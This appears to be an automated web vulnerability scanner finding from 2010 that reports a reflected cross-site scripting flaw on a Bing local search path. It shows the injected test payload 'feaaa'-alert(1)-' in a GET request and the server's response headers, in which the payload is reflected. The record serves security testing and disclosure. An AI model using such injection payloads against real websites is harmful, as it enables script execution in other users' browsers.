1. Cross-site scripting (reflected)
Severity: | High |
Confidence: | Certain |
Host: | http://www.bing.com |
Path: | /local/Default.aspx |
GET /local/feaaa'-alert(1)- Host: www.bing.com Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: SRCHUID=V=2&GUID |
HTTP/1.1 200 OK Cache-Control: no-cache Pragma: no-cache Content-Type: text/html; charset=utf-8 Expires: -1 X-BM-TraceID: b5650ff62a564b35b571 SearchRequest: Microsoft.VirtualEarth SearchRequestState: Success X-AspNet-Version: 2.0.50727 X-BM-Srv: SN1M001203 X-UA-Compatible: IE=7 Date: Sat, 18 Dec 2010 01:10:47 GMT Content-Length: 19556 Connection: close Set-Cookie: BID=4167f1868d7c465d Set-Cookie: CID=721406f5edaf46bb Set-Cookie: CDate=12/18/2010 1:10:47 AM; expires=Fri, 31-Dec-9999 23:59:59 GMT; path=/local/feaaa'-alert Set-Cookie: VE_LSV=cache=0; path=/local/feaaa'-alert <!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR <html xmlns="http://www.w3.org ...[SNIP]... se=or3,preallocation=0' ...[SNIP]... |